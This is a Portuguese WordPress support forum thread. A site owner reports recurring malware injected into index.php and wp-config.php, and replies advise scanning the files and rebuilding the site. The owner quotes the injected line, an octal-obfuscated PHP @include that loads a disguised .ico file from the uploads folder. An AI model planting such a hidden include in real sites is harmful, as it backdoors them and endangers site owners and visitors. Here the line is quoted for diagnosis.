Suporte » Outros assuntos » Malware detectado *3efad*

  • robertosilveira

    (@robertosilveira)


    Estou com um problema seríssimo na página “quarksautomacao.com”.

    Os anúncios Google Ads começaram a ser rejeitados com a informação da existência de Malware.

    Após instalar o Wordwfense, detectei alterações nos arquivos index.php, wp-config.php.

    Ao verificar os arquivos, apareceria a inclusão da seguinte linha:

    /*3efad*/

    @include “\057ho\155e/\161ua\162ks\141u/\160ub\154ic\137ht\155l/\161ua\162ks\145ne\162gi\141.c\157m.\142r/\167p-\143on\164en\164/u\160lo\141ds\057.b\14511\145af\071.i\143o”;

    /*3efad*/

    Excluindo as linhas das páginas, passado um tempo, os códigos voltam a ser inseridos.

    No servidor, observei a criação de pastas suspeitas inexistentes no WordPress, mas com nomes comuns numa home page, como images, cgi-bin, TMP, dopwnloads, etc, todas contendo um index.php com o código malware.

    Mesmo após limpar todo o servidor, ativar as proteções, alterar as senhas, atualizar os temas e plugins, os códigos voltam a aparecer na página.

    Talvez alguém possa me ajudar a solucionar esse grave problema.

Visualizando 2 respostas - 1 até 2 (de um total de 2)
  • Moderador Ralden Souza

    (@ralden)

    Um apaixonado por WordPress e desenvolvedor na HospedaPress

    olá @robertosilveira,

    há um erro nesse momento em sua página, informando a ausência do arquivo wp-config.php.

    depois que resolver isso, sobre o Malware, há 2 possibilidades.

    primeira, usando o Sucuri Security ou o All In One WP Security, você pode fazer uma vistoria de arquivos modificados. essa vistoria é baseado na versão original do WordPress. dá muito trabalho, mas lhe permitirá ver todas as modificações existentes.

    quando isso está muito extenso ou pelos alertas de e-mail do Sucuri percebo que está havendo constante tentativas de invasão, criou um site do WordPress do zero e importo apenas o conteúdo. com isso elimino risco de usar backup com arquivos contaminados, garantindo que todos os arquivos são limpos.

    normalmente uso essa segunda solução, mas isso me é facilitado pelo uso do Elementor, que me permite exportar os modelos de páginas e posts. deixo esses modelos guardados junto com os backups e quando preciso para restaurar o site, eu os uso, o que acelera muito reocnstruir o site.

    boa sorte,

    Everaldo Matias

    (@everaldomatias)

    @robertosilveira reforçando o que o @ralden falou, sugiro que crie uma nova instalação e importe somente o conteúdo/ mídias para reduzir as possibilidades de falhas/brechas que possam existir em arquivos que já estejam incorporados ao seu WordPress.

    E também recomendo manter sempre atualizado o WordPress, assim como seus plugins e temas. A hospedagem também precisa de atenção, quando possível, mantendo atualizada a versão do PHP.

Visualizando 2 respostas - 1 até 2 (de um total de 2)
  • O tópico ‘Malware detectado *3efad*’ está fechado para novas respostas.